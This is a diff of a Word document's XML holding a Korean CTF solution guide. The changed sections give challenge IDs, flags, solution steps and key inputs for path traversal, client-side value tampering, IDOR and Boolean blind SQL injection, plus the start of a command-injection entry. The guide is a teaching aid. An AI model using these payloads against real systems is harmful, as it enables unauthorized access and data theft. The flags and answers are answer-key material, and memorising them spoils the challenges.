     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1508,33 +2514,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>file 파라미터가 보급 파일명을 받아 서버 파일을 읽는 구조를 확인한다.</w:t>
+        <w:t>localStorage에서 idleEmpireSave 값을 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>필터는 파일명에 .png가 포함되는지만 확인한다.</w:t>
+        <w:t>totalEarned가 목표 달성 판단에 쓰이는지 본다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>경로 이동 표현을 사용하되, 파일명 어딘가에 .png 문자열을 남긴다.</w:t>
+        <w:t>totalEarned를 100000000 이상으로 바꾼다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>최종 경로가 assets/vault/flag.txt를 가리키게 만든다.</w:t>
+        <w:t>claim 요청 후 FLAG를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1542,20 +2552,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>cover.png/../flag.txt</w:t>
+        <w:t>localStorage.setItem('idleEmpireSave', JSON.stringify({coins:100000000,totalEarned:100000000,playTime:0,levels:{}}))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1563,64 +2574,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>중요한 검증을 클라이언트 값에 맡기면 사용자가 결과를 바꿀 수 있다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{image_vault_path_filter_bypass}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 환경에 따라 경로 정규화가 다를 수 있으므로 .png를 유지한 우회 경로를 여러 방식으로 시도할 수 있다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>5. 코인 제국 보급 작전</w:t>
+        <w:t>5. 작전 보고서 열람소</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>idle-empire</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>mission-report</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1628,22 +2657,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Client Trust / 중급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>IDOR / 중급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1651,22 +2700,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>300</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>280</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1674,27 +2743,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>클라이언트 저장소와 보고 요청 값을 조작해 목표 누적 코인을 달성한 것처럼 만든다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{cDgkb2FfdDE5MV9ycjQ}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>보고서 번호를 직접 바꿔 비공개 보고서에 접근한다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1706,33 +2808,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>브라우저 개발자 도구에서 localStorage의 idleEmpireSave 값을 확인한다.</w:t>
+        <w:t>공개 보고서 목록을 클릭하고 URL의 report 값을 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>totalEarned 값이 목표 달성 판단에 사용되는지 확인한다.</w:t>
+        <w:t>목록에는 1001~1003만 보이지만 서버가 번호를 직접 받는지 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>totalEarned를 100000000 이상으로 조작하거나 claim 요청의 totalEarned 값을 직접 크게 보낸다.</w:t>
+        <w:t>1004~1007 더미 보고서로 번호 기반 구조를 파악한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>승인 API가 클라이언트 값을 신뢰해 FLAG를 반환한다.</w:t>
+        <w:t>report=1008에 접근해 비문 보고서의 FLAG를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1740,20 +2846,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>localStorage.setItem('idleEmpireSave', JSON.stringify({coins:100000000,totalEarned:100000000,playTime:0,levels:{}}))</w:t>
+        <w:t>http://100.83.178.9/challenges/mission-report.php?report=1008</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1761,64 +2868,82 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>객체 ID만 바꿨을 때 권한 검사가 없으면 다른 객체에 접근할 수 있다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{idle_empire_client_trust_bypass}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 중요한 검증을 클라이언트에 맡기면 사용자가 값을 바꿔 결과를 위조할 수 있다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>6. 작전 보고서 열람소</w:t>
+        <w:t>6. 비문 공지 검색소</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>mission-report</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>blind-notice</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1826,22 +2951,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>IDOR / 중급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Boolean Blind SQL Injection / 중상급</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1849,22 +2994,42 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>325</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>340</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1872,27 +3037,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>공개 목록에는 없는 보고서 번호를 URL에서 직접 바꿔 비문 보고서를 열람한다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{boolean_blind_notice_42c7}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>검색 결과 존재 여부만으로 FLAG를 한 글자씩 추출한다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1904,33 +3102,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>공개 보고서 목록의 링크를 클릭하며 URL의 report 파라미터 변화를 관찰한다.</w:t>
+        <w:t>따옴표를 닫고 OR 조건을 붙여 참/거짓 반응 차이를 만든다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>화면에는 1001~1003만 보이지만 서버가 요청 번호의 권한을 확인하지 않는지 확인한다.</w:t>
+        <w:t>SUBSTR(body,위치,1) 조건으로 문자를 하나씩 비교한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>URL에서 report 값을 1004, 1005처럼 순서대로 바꿔본다.</w:t>
+        <w:t>응답 문구가 “조건에 맞는 공지가 존재합니다.”인지 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>더미 보고서를 지나 report=1008에서 관리관 전용 비문 보고서와 FLAG를 확인한다.</w:t>
+        <w:t>반복 요청이 많으므로 스크립트로 자동화한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1938,20 +3140,21 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>http://100.83.178.9/challenges/mission-report.php?report=1008</w:t>
+        <w:t xml:space="preserve">%' OR SUBSTR(body,1,5)='FLAG{' -- </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1959,26 +3162,23 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
+        <w:t>핵심 포인트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>데이터가 출력되지 않아도 Boolean 반응만 있으면 추출 가능하다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:sectPr>
+          <w:pgSz w:w="12240" w:h="15840"/>
+          <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
+          <w:cols w:space="720"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{cDgkb2FfdDE5MV9ycjQ}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>메모: 객체 ID를 추측할 수 있고 권한 검사가 없으면 다른 사용자의 객체에 접근할 수 있다.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1992,30 +3192,51 @@
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="4320"/>
-        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4896"/>
+        <w:gridCol w:w="4896"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제 ID</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>net-diagnostics</w:t>
             </w:r>
           </w:p>
@@ -2024,21 +3245,41 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>Command Injection / 중상급</w:t>
             </w:r>
           </w:p>
@@ -2047,21 +3288,41 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
